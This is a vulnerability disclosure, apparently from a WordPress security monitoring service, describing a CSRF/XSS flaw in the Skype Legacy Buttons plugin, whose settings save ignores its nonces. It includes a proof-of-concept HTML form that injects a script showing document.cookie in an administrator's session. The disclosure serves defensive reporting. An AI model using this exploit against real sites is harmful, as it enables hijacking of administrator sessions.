One of the ways that we are able to provide wider coverage of WordPress plugin vulnerabilities than you can find elsewhere is that we do extensive monitoring of various places where information on vulnerabilities comes up. One of those is the Support Forum on wordpress.org, through that we ran across a odd statement in response to a review of the plugin Skype Legacy Buttons:
Please note that the Chrome browser will throw an error ERR_BLOCKED_BY_XSS_AUDITOR when submitting an email address as Skype ID. This will look scary but just refresh the page and you’ll see the settings have updated correctly.
That error isn’t caused by the issue they are claiming, but when we went to take a look at the plugin we found a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability.
For the CSRF portion the plugin actually included multiple nonces with the request to save the settings (it isn’t clear why there is more than one):
<?php wp_nonce_field('skype_status_options-metaboxes-general'); ?> <?php wp_nonce_field('closedpostboxes','closedpostboxesnonce',false) ?> <?php wp_nonce_field('meta-box-order','meta-box-order-nonce',false) ?>
The problem is that when saving the settings there is no check to make sure that a valid nonce is included, so those nonces have no impact.
One the settings on the page is intended to contain HTML code and preview of it is shown on the setting’s page, so that can be used to cause XSS when combined with the CSRF vulnerability.
We notified the developer of the issue over a week ago, but we haven’t heard back from them and the vulnerability has yet to be fixed.
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/options-general.php?page=skype-status.php, when submitted as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/options-general.php?page=skype-status.php" method="POST"> <input type="hidden" name="skype_status_update" value="Save Changes"> <input type="hidden" name="button_theme" value="custom_edit"> <input type="hidden" name="button_template" value="</textarea><script>alert(document.cookie);</script>"> <input type="submit" value="Submit" /> </form> </body> </html>
June 1, 2017 – Developer notified.